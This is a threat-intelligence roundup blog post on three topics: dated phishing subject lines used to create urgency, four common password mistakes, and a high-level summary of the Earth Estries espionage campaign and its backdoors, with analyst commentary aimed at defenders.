CTI Roundup: Stop Making These Four Common Password Mistakes Now

In this week’s roundup, CTI investigates how threat actors are putting misleading dates in the subject lines of phishing emails to influence the emotions of their recipients. Next, CTI presents the four most common password mistakes users make, and how hackers can take advantage of them. Finally, CTI provides an update on the Earth Estries cybercriminal group and its latest cyberespionage campaign.

1. Threat actors use misleading dates in phishing subject lines

A recent Cofense blog reveals how threat actors are including misleading dates in the subject lines of phishing emails. The analysis also reveals some interesting trends in subject lines with dates in them and targeted subsectors.

The ratios of subjects containing dates vs. those without

The analysis began by looking at subjects that had dates of any format. This included subject themes related to late faxes, missed voicemails, overdue invoices, payroll, and other items requiring immediate attention. The number of emails with dates in the subject line varied based on the subsector.

The subject with the highest percentage of dated subjects was rail transportation at 48%. This was closely followed by oil and gas at 45%. The sectors with the lowest percentage were real estate and wholesale trade at 13% each. Each subsector had a date in roughly 31% of its subjects.

Drilling down into these emails with dates in their subject lines, Cofense further separated them based on the dates themselves. The categories were based on the date in relation to when the email was accessed.

The first category, early emails, included messages where the date in the subject was after the day the email was accessed. The second category, on-time emails, included messages where the date in the subject matched the day the email was accessed. The final category, late emails, included emails where the date in the subject was before the day the email was accessed.

• Early emails: Few threat actors sent emails with subject dates later than the day they were accessed. Early subjects made up only 2% of all subjects with dates in them. According to Cofense, most of these emails stem from threat actor accidents and misconfigurations.
• On-time emails: Emails with subject dates matching the day the email was accessed were the second most common. Subsectors on average had 31% of their subjects with dates that were the same as the day the emails were accessed. These emails were the most customized, with 58% of the subjects having some sort of custom content, or PII requiring redaction. The most popular theme was action-oriented subjects, likely in an attempt to receive immediate action from the recipient.
• Late emails: The most common category of emails is those with dates in their subject line from before the email is accessed. This is likely to facilitate a false sense of urgency, warning victims that a deadline has already passed and they are already late.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“The key takeaway is that threat actors leverage dates in email subject lines to create a sense of urgency and elicit a response or interaction out of the recipient. This is not a new fact.”

“What is new is the breakdown of the date the threat actor chooses to use. It is interesting that most of these phishing emails use a date in the subject line from before you would open the email. This really toys with your mentality as your immediate reaction is that you missed something or forgot to do something.“

2. Four common password mistakes to avoid

Password security provider Specops has detailed what they believe to be the four most common password mistakes users make — and how hackers can take advantage of each.

According to Specops, these common password mistakes occur because our brains are good at pattern completion. This gives us a natural affinity for patterns that are satisfying or easy to remember.

Mistake 1: Common base terms

Users tend to look for a base word when creating a password. While a random base word may seem harmless, these base words are rarely truly random and hold more relevance than we often realize.

Users will often incrementally tweak the same base word during routine password resets/expiries to get around default password history requirements or complexity settings. Specops often sees users capitalizing the first letter of this base word and/or adding special characters to the end.

Threat actors know that they do not need to crack the strongest password as a way into an organization. Instead, they can crack a weak password and move laterally. They will exploit common base terms in an attack known as a dictionary attack, where they will use a predefined list of weak base terms to guess passwords. This attack is simple but often successful because people tend to use simple and familiar passwords.

A previous analysis by Specops of millions of passwords reveals the most common base term to be “password.” Some of the other common base terms include “admin” and “welcome.” Since we often use base words that have some relevance to our everyday lives, social media offers a goldmine for threat actors. Threat actors can use social media profiles to target specific individuals and can easily learn facts like birthdays, family names, pet names, and places of significance that may be used as a base word in a password.

Mistake 2: Short password length

Threat actors still face a lot of variation when trying to guess passwords — even those with weak base terms. They can use brute force techniques to iterate through potential password combinations until they discover the right password. Brute force attacks are particularly effective against short passwords, and even more effective on short passwords that start with a common base term.

Specops found that 88% of compromised passwords from their research were 12 characters or less. Enforcing a longer password length can be an effective defense against these attacks.

Mistake 3: Keyboard walk patterns

A less frequently talked about password mistake is related to keyboard walk patterns, which are essentially passwords inspired by the layout of a keyboard.

An example of this can be seen with the word QWERTY, which is an easy-to-remember “keyboard walk” for the user. Specops found that the pattern qwerty was identified over 1 million times in passwords, emphasizing how common keyboard walks are.

Even though keyboard walk patterns may not be real words, they can still be used in dictionary attacks. Threat actors are always trying to understand how and why people do certain things, so they can better capitalize and plan their attacks. Because keyboard walks are predictable, they are sometimes included in the list of probable passwords that are then used in dictionary attacks.

Mistake 4: Password reuse

Even strong passwords can be compromised, which becomes an even bigger issue if that same password is reused for different applications. Research indicates that 65% of people reuse passwords — a fact that threat actors know all too well.

Password reuse is a big part of why many threat actors focus on credential theft and the sale of these passwords, as a stolen password from one application could be exploited elsewhere.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

Good password hygiene has always been important, but it’s becoming even more so as the threat landscape continues to evolve. And until the whole world goes passwordless through emerging technologies like Entra ID, Duo, or KelvinZero, each of us has a role to play in protecting ourselves and our organizations through password hygiene.

The increase in the popularity of infostealers is a prime example of why we should be more cautious than ever when choosing our passwords. There is a lot of buzz about the future of authentication being passwordless, but it will likely take some time for this shift to occur. In the meantime, we can likely all improve (or at least be more mindful) when creating and managing passwords.

3. Earth Estries targets global governments and tech companies

The Earth Estries cybercriminal group has been attributed to a new cyberespionage campaign targeting government and technology industries in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. The threat actor is actively working with high-level resources and functions with sophisticated skills and experience.

Infection routine

• Earth Estries compromises existing accounts with administrative privileges after successfully infecting an internal server.
• The operation installed Cobalt Strike on the system before deploying additional malware and performing lateral movement. SMB and WMIC were used to propagate various backdoors and hacking tools to other machines in the environment.
• The threat actor targeted PDF and DDF files for archival, which were uploaded to online storage repositories like AnonFiles or File.io via curl.exe.
• Earth Estries regularly cleaned their existing backdoor after finishing each round of the operation, redeploying a new piece of malware when beginning another round.

Earth Estries backdoor and hacking tools

Earth Estries has been observed using various tools in this campaign including infostealers, browser data stealers, port scanners, and more.

Trend Micro covers the newly discovered and noteworthy toolsets from this campaign.

• Zingdoor: Zingdoor is an HTTP backdoor written in Go that was first encountered in April 2023, though some logs indicate this backdoor has been around since mid-2022. This backdoor is rarely seen in the wild but is packed using UPX and is heavily obfuscated. In this campaign, it was disguised as mpclient.dll and designed to run via DLL sideloading by abusing Windows defender binary, MsSecEs.exe. It will register the current parent process as a Windows Service with the name MsSecEsSvc for persistence. It will also connect and wait for a command from the C2 server. It’s capable of getting system information, Windows service information, disk management, and running arbitrary commands.
• TrillClient: TrillClient is an infostealer designed to grab browser data. It installs itself as a Windows service Net Connection, creates a victim list based on the input victim ID, launches itself through starting services, and cleans up the installation process by deleting the service. It connects to a hard-coded GitHub repo to retrieve the command for its next actions. It can collect browser credentials and schedule a task to collect browser credentials.
• HemiGate: HemiGate is a backdoor that is executed via DLL sideloading. It executes in three instances. The first instance is launched with no parameters and its main purpose is to install startup mechanisms and execute the second instance before terminating. The second instance is responsible for reading the config file and communicating with the C2 server before communicating with the third instance. The third instance executes a keylogger and receives/executes commands passed by the second instance.

Victimology

Earth Estries focuses its attacks on government-related organizations and technology companies. Attacks have taken place in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the US.

Researchers also observed network traffic to C2 servers in Canada and toolset detections in India and Singapore.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“This campaign adds to the trend of threat actors abusing public services like GitHub, AnonFiles, and File.io as part of their operations.”

“The group seems to be rather sophisticated, leveraging several new backdoors and hack tools in its latest campaign. Trend Micro notes that Earth Estries focuses on cyber-espionage campaigns. With that in mind, its targeting of several countries across the globe is very broad.”

---

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.